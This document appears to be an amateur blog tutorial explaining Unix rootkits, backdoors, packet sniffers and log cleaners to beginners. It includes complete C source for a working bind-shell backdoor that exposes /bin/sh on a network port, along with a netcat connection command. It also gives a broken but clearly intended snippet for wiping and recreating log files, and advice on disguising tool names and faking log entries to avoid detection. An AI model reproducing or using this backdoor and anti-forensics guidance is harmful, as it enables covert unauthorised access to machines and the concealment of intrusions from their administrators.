This whitepaper will help you grasp and understand the concepts of "root kits".
I will try to explain it in an easy to follow format.
Previous knowledge of *nix OS's will help you in this tutorial it is written for beginner/intermediate skill range or so
It is strongly recommended that before you even attempt to compile or use any of the rootkits mentioned in this paper you know EXACTLY what you are doing and you are running such programs in a controlled environment. E.g. a controlled environment would be a stand alone PC disconnected from all forms of communication (network, internet, intranet etc) An un-controlled environment would be a PC connected to the Internet or a network (Your companies network would be a very stupid choice!)
This brings us to the "Disclaimer"...
********************************************** DISCLAMIER **********************************************
This information has been written for educational purposes only if you do something stupid with it then you deserve to be locked in a federal pound me in the arse prison
1.3 - What is a root kit?
A rootkit is a program that can be found or created in all different shapes and styles, some more advanced than others.
Rootkits are basically programs that help attackers keep their position as root. 'root' meaning the highest level of administration on *nix based systems
Rootkits contain tools which help attackers hide their presence as well as give the attacker full control of the server or host continuously without being noticed.
Rootkits are usually installed on systems when they have been compromised and the highest level of access has been given (usually root)
Once the system has been successfully compromised and the attacker has root, he or she may then install the rootkit, allowing them to cover their tracks and wipe the log files amongst other things.
A typical rootkit consists of the following utilities however not all inclusive
(Note: We will look at these in a lot more detail later on)
Backdoor Programs - login backdoors, telnetd etc
Packet Sniffers - Sniff network traffic such as FTP, TELNET,POP3
Log-Wiping Utilities - Bash the logs to cover tracks
DDoS Programs - Turn the box into a DDoS (denial of service) client
IRCBots - Bots used to take over IRC channels
Miscellaneous programs - May contain exploit, log editor
(Don't worry to much if you don't understand any of the above, as I said were look at this all in a lot more detail further down)
1.4 - Hacker Jargon Definition
"rootkit: /root´kit/, n. A kit for maintaining root; an automated cracking tool. What script kiddies use. After a cracker has first broken in and gained root access, he or she will install modified binaries such as a modified version login with a backdoor, or a version of ps that will not report the cracker's processes). This is a rootkit."
1.5 - Hacker or Script kiddie
Now the question you are probably asking yourself is "Is a rootkit a hackers tool or just another script kiddie tool?" Well, the "Hacker Jargon" defines a rootkit as a script kiddies tool and to some extent it is right Rootkits don't really require that much skill to run or use. Most rootkits can be compiled like this..
gcc t0rn.c -o rootkit
then...
./rootkit
Note: obviously when compiling all "hacker" tools you need to chose a name which disguises it's purpose, so rootkit would be a really stupid choice
However there are some rootkits that require more skill to run and use. Some rootkits require you to edit the source code before it's compiled and some even need you to edit the iptables and kernel. (A good example would be a rootkit that was used in 2002 at the Black Hat Conference)
1.6 - Who uses rootkits and why?
I have already covered this in the previous sections, however I will summarize what we have learned so far...
Hackers and script kiddies use rootkits
They are used maintain root and cover tracks.
Most Script kiddies lack knowledge of *how* a rootkit really works and most often they will end up deleting key binary files. (Basically, script kiddies will let you know when they have compromised your system)
Rootkits are only installed when the system has been compromised and root has been gained.
1.7 - The Language rootkits are coded in
Most rootkits are coded in C or Assembly (Shell code). Most of the well-known rootkits are coded in C so the attacker can edit the source code to fit its target specification.
1.8 - Different types of rootkits At this time there are 2 "main" types of rootkits.
Application rootkits - Established at the application layer
Kernel rootkits - Established at the kernel level (Core of any OS)
Application rootkit.
An application rootkit is basically a rootkit which "replaces" all the well know system binary files (ls, netstat, killall) with "fake" or "Trojaned" ones. The trojaned or fake system files will help hide the attackers presence, report false information to the system administrator and even provide a Backdoor for the attacker.
Remember, this section has only be written so you can distinguish the differences between a "Application" rootkit and "Kernel" rootkit.
Kernel rootkit
A Kernel rootkit is a rootkit that buries itself deep in the Kernel. This makes it extremely hard to detect and remove.
Kernel rootkits are more advanced then Application rootkits.
A Kernel rootkit works by exploiting and manipulating Kernel capabilities.
Now I don't really want to go into much detail on Kernel rootkits because they are quite advanced and this is not an advanced guide But i will cover them some later in the paper
2 - Backdoors
Most of today’s (decent) rootkits contain "Backdoors".
Now you should all know what a Backdoor is but just in case you don't I will give a brief explanation.
Backdoor -
A program or script which allows an attacker to establish some form of privilege and remote communication without logging into the system.
Backdoors are usually installed when the system has been successfully compromised and some form of exploit has been entailed.
The advantage of installing a backdoor on a system means that the attacker doesn't have to keep using the same exploit over and over again.
The disadvantage of installing a backdoor means at one point or another the system administrator will notice suspicious activity in his network traffic, if he or she were to run a port scanner such as Nmap then he or she would uncover an open port and remove the backdoor.
A typical example of a Windows NT2000 backdoor is one entitled "Tini.exe" (Made by NTSecurity) This little program listens on port 7777 for incoming connections, once a connection has been established a remote command shell is executed for the attacker who establishes the connection.
*nix backdoors come in *many* shapes and sizes.
Login Backdoor - Modifying login.c to look for backdoor password before stored password. Attacker can log into any account using backdoor password.
Telnetd Backdoor - Trojaned the "in.telnetd" to allow attacker gain access with backdoor password.
Services Backdoor - Replacing and manipulate services like "ftp", "rlogin", even "inetd" as backdoor to gain access.
Cronjob backdoor - Backdoor could also be added in "crontjob" to run on specific time for example at 12 midnight to 1 am.
Library backdoors - Almost every UNIX and Windows system have shared libraries. Shared libraries can be backdoor to do malicious activity including giving a root or administrator access.
Kernel backdoors - This backdoor is basically exploiting the kernel, which is core of the operating system to handle and to hide backdoor effectively
Network traffic backdoors which typically using TCP, UDP, and ICMP - Backdoor that Exploiting network traffic protocol is widely used. In TCP protocol backdoor like ssh is Popularly used because it communicate in encrypt, while crafting and tunneling packet In UDP and ICMP traffic will give a better chances escaping from firewall and "netstat".
To finish of this section on backdoors, I feel like adding some source code. (This is a basic TCP Backdoor for *nix if you don't own a copy of linux or unix don't even attempt to compile this
/* backdoor.c - basic unix tcp backdoor.
*
* This is a basic UNIX TCP backdoor. /bin/sh is binded to the port of your
* choice. Access the shell with telnet or netcat:
*
* root# nc -v hackedhost.com 1337
*
* I do not take responsibility for this code.
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define BACKLOG 5
#define SHELL "/bin/sh"
void usage();
int main(int argc, char *argv[]) {
if(argc <2) {
usage(argv[0]);
}
int sock, csock;
struct sockaddr_in client;
struct sockaddr_in mine;
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Couldn't make socket!n"); exit(-1);
}
mine.sin_family = AF_INET;
mine.sin_port = htons(atoi(argv[1]));
mine.sin_addr.s_addr = INADDR_ANY;
if(bind(sock, (struct sockaddr *)&mine, sizeof(struct sockaddr)) == -1) {
printf("Could not bind socket!n");
exit(-1);
}
if(listen(sock, BACKLOG) == -1) {
printf("Could not listen on socket!n");
exit(-1);
}
printf("Listening for connections on port %s!n", argv[1]);
while(1) {
int sin_size;
sin_size = sizeof(struct sockaddr);
csock = accept(sock, (struct sockaddr *)&client, &sin_size);
dup2(csock, 0);
dup2(csock, 1);
dup2(csock, 2);
execl("/bin/sh","/bin/sh",(char *)0);
close(csock);
}
}
void usage(char *progname[]) {
printf("Usage: %s <port>n", progname);
exit(-1);
}
The main purpose of me showing you this source is to give you a general idea of what a rootkit consists of. Remember rootkits come in many shapes and sizes and every rootkit is most likely to contain some form of Backdoor...
So what else do rootkits contain apart from Backdoors?
"Sniffers". 2.1 - Sniffers
A lot of today’s rootkits contain programs known as "Sniffers". What are Sniffers? (Also known as Packet Sniffers)
Packet Sniffers are programs that are made to "Monitor" network traffic, TCPIP or any other network device. I'm sure you know when you are browsing the Internet or playing online games "Packets" of data are going to and from your Computer
Attackers install Sniffers so they can capture valuable information which is floating to and from your computer. What type of valuable information? Here is a list of what a Sniffer is capable of...
Sniffing FTP passwords
Sniffing Telnet passwords
Sniffing Network passwords
Sniffing POP3 passwords
Capturing websites you have visited
Sniffing Gateways
And of course much much more
Some of you may be thinking "Won't my passwords been encrypted as they are passing over my network?" To some extent this is true, some services provide encryption (Such as E-mail if you were using PGP sniffing would be useless, unless of course your a good cryptographer)
Other services such as ftp and telnet transfer their passwords in plain text, so it would be easy for an attacker to just capture the packet then dump it into a text editor it would only take a couple of minutes for an attacker to uncover the plain text password.
Now there is a technical side to Sniffers that I don't really want to go into. For more information on Sniffers please read http://www.sans.org/infosecFAQ/switchednet/sniffers.htm this paper was written by a "Jason Drury" and it is quite usefull.
Most rootkits DO sometimes contain "ready to run" Sniffers and Sniffers are hard to detect once they are running. (Were look at this a little later) The purpose of this section was just to show you WHAT a Sniffer is..
2.2 - Cleaners (Log Bashers)
Log Bashers (Also known as Log deleters, Log killers and Log Cleaners) No matter what the title they all do the same thing. Delete system log files. System Administrators rely on logging as an extra form of security.
Log files can keep track on who logged in last and at what type, what programs were run as that user was logged in etc etc... Therefore it is exceptionally important for the attacker to destroy ALL traces of log files.
Note: some of you may be thinking.. "If all the Log files are deleted won't this give an indication to the system administrator that there box has been hacked?"
If you’re thinking that, then your dead right. Deleting the log files can sometimes be pretty stupid, the best way to get around the log files is to "edit" the entries by deleting your entries and filling in some false ones
Another way is to delete the whole log file then to "re-create" them. Here is a VERY simple script I made to demonstrate what I mean...
int main() system("rm-rf /root/logs/LastEntry.log");
touch(" /root/Logs/LastEntry.log"); return 0;
Now for those who don't know any C then I shall I explain. The first main line of the code is telling the C program to remove the file LastEntry.log, delete it.
The second line is telling the program to create a file called LastEntry.log in the exact same location.
So when the system administrator opens the log file he will be confronted with a blank file. (This may be a bit stupid because if the admin is security minded he will know the system has been compromised. However Some stupid admins see it as a 'Bug' therefore you get away with it.)
Most rootkits contain some form of log-cleaner, but before you execute it you need to make sure you know exactly HOW it works, otherwise your just another noob who "presumes" this tool will cover your tracks completely.
Some log cleaners search certain directories for words like "IP" "Login", "Logs", "Log" etc and then delete them.
Some just delete all the default log files that are in the default system location.
Note: Before you compile a rootkit I suggest you learn C and take a look at the source code you may find you need to edit some of the entries.
It's important you come FULLY prepared before you go out and install your rootkit. I have been doing this long enough to realize even if you successfully edit or Delete a bunch of log files it doesn't mean you’re untraceable. You still need to think about system programs which are running, which may have their own logging capabilities.
IP Address
Subscribe To
Posts
Comments
{ 0 comments... Skip to Comments }
Please comment here